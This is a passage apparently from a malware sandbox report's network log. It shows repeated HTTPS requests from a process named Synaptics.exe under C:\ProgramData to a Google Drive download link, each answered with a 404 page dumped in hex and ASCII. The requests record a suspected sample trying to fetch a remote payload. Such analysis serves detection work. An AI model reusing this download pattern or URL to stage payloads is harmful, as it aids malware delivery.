                                                                                                                                                                                        2022-05-17 11:32:08 UTC903INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:08 UTC903INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        297192.168.2.350086142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC900OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC903INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uMlQArwHy6BFFaruVfQNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC905INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:08 UTC905INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 6a 74 75 4a 57 58 38 70 76 72 68 72 41 32 49 63 4a 70 45 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BjtuJWX8pvrhrA2IcJpE1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:08 UTC906INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:08 UTC906INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        298192.168.2.350087142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC903OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC906INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m0HeFW7NJHeUylE5RNHkBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC907INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:08 UTC907INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 72 7a 77 31 59 4b 49 75 45 76 56 47 6d 50 34 4c 54 37 68 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="krzw1YKIuEvVGmP4LT7hZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:08 UTC909INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:08 UTC909INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        299192.168.2.350088142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC909OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC909INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-X4yMWrjJoXpLI0FTu6fMEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC911INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:08 UTC911INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 4e 78 78 68 4f 43 63 56 50 42 6c 63 67 30 6e 39 46 50 2b 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pNxxhOCcVPBlcg0n9FP+oA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:08 UTC912INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:08 UTC912INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        3192.168.2.349737142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:29 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:29 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NdGPl7354m7+aXfTHlgQpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:29 UTC10INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 43 36 54 78 65 7a 31 49 4f 54 45 72 34 7a 44 65 6b 58 78 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mC6Txez1IOTEr4zDekXxpw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:29 UTC12INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:29 UTC12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        30192.168.2.349771142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC87OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC90INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z3czQcOeeLROFUbMzDMNjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC91INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC91INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 50 54 4c 6f 71 6e 6a 62 35 59 2b 49 4f 34 69 58 33 4b 4e 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jPTLoqnjb5Y+IO4iX3KN3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
